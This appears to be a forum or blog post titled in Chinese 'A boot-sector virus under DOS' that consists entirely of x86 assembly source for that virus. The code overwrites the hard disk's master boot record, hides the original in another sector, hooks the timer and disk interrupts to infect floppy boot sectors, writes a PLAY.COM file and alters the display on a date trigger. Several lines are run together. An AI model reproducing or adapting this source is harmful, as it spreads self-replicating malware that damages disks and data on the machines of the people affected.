| DOS下的一个引导型病毒 CSEG SEGMENT
ASSUME CS:CSEG
BEGIN: MOV AX,CS
CMP AX,0
JZ START
JMP FILE
;********************************** DATA
DATE DB 00H
PZ DB 77H
TIME DW 200H
JMPA DW 7C00H
DW 0000H
JMPN DW OFFSET NEXT
DW 0020H
FN DB 'PLAY.COM',0
;************************************
START: XOR AX,AX
MOV DS,AX
MOV SS,AX
MOV ES,AX
MOV SP,7C00H MOV AX,DS:[20H] ;SAVE INT 8H
MOV DS:[180H],AX
MOV AX,DS:[22H]
MOV DS:[182H],AX MOV SI,SP
MOV DI,0200H
MOV CX,0200H
CLD
REP MOVSB MOV BX,OFFSET JMPN+7C00H
JMP DWORD PTR CS:[BX] NEXT: MOV AX,OFFSET NEW08 ;MODI INT 8H
MOV DS:[20H],AX
MOV AX,0020H
MOV DS:[22H],AX MOV BX,0600H
MOV AX,0201H
MOV CX,0001H
MOV DX,0080H
INT 13H CMP BYTE PTR ES:[PZ+0600H],077H
JZ NC MOV AX,0301H
MOV CX,0017H
MOV DX,0080H
INT 13H MOV SI,0200H
MOV DI,0600H
MOV CX,0200H
CLD
REP MOVSB MOV AX,0301H
MOV CX,0001H
MOV DX,0080H
INT 13H NC: MOV BX,7C00H
MOV AX,0201H
MOV CX,0017H
MOV DX,0080H
INT 13H MOV AH,04H
INT 1AH MOV CS:[DATE],DL MOV BX,OFFSET JMPA
JMP DWORD PTR CS:[BX]
;***********************************RUN HD BOOTER PRG
NEW08: PUSH AX
PUSH DS DEC CS:[TIME]
JNZ I08 XOR AX,AX
MOV DS,AX MOV AX,DS:[4CH]
MOV DS:[184H],AX
MOV AX,DS:[4EH]
MOV DS:[186H],AX
MOV AX,OFFSET GR ;MODI INT 8H
MOV DS:[20H],AX
MOV AX,OFFSET NEW13
MOV DS:[4CH],AX
MOV AX,OFFSET NEWF
MOV DS:[94H],AX
MOV AX,0020H
MOV DS:[22H],AX
MOV DS:[4EH],AX
MOV DS:[96H],AX
MOV CS:[TIME],200H I08: POP DS
POP AX
INT 60H
IRET
;***************************************
NEW13: CMP AH,02H
JZ CNE
CMP AH,03H
JNZ I13
CMP DL,00H
JNZ CNE PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES PUSH CS
POP ES
MOV AX,0301H
XOR BX,BX
MOV CX,0001H
MOV DX,BX
INT 61H
POP ES
POP DX
POP CX
POP BX
POP AX
JMP I13
CNE: CMP DX,0080H
JNZ I13
CMP CX,0001H
JNZ I13
MOV CX,0017H I13: INT 61H
IRET
;*******************************************
NEWF: PUSH CS
POP DS
MOV DX,OFFSET FN
MOV CX,00000001B
MOV AH,3CH
INT 21H MOV BX,AX
MOV AH,40H
MOV CX,400H
XOR DX,DX
INT 21H MOV AH,3EH
INT 21H
MOV AX,0003H
INT 10H
JMP NCF GR: PUSH AX
PUSH BX
PUSH CX MOV AX,0900H
MOV CX,0001H CMP CS:[DATE],15H
JZ GR1
MOV BX,111B
GR1: INT 10H NG: POP CX
POP BX
POP AX
INT 60H
IRET
;************************************
FILE: PUSH CS
POP ES
XOR AX,AX
MOV DS,AX
CMP BYTE PTR DS:[200H+PZ],77H
JZ NCF MOV AH,77H
MOV DS:[200H+PZ],AH
MOV BX,0300H
MOV AX,0201H
MOV CX,0001H
MOV DX,0080H
INT 13H MOV AX,0301H
MOV CX,0017H
MOV DX,0080H
INT 13H PUSH CS
POP DS
MOV SI,0100H
MOV DI,BX
MOV CX,01B0H ;CX 1B0H
CLD
REP MOVSB MOV AX,0301H
MOV CX,0001H
MOV DX,0080H
INT 13H NCF: MOV AH,4CH
INT 21H
CSEG ENDS
END BEGIN |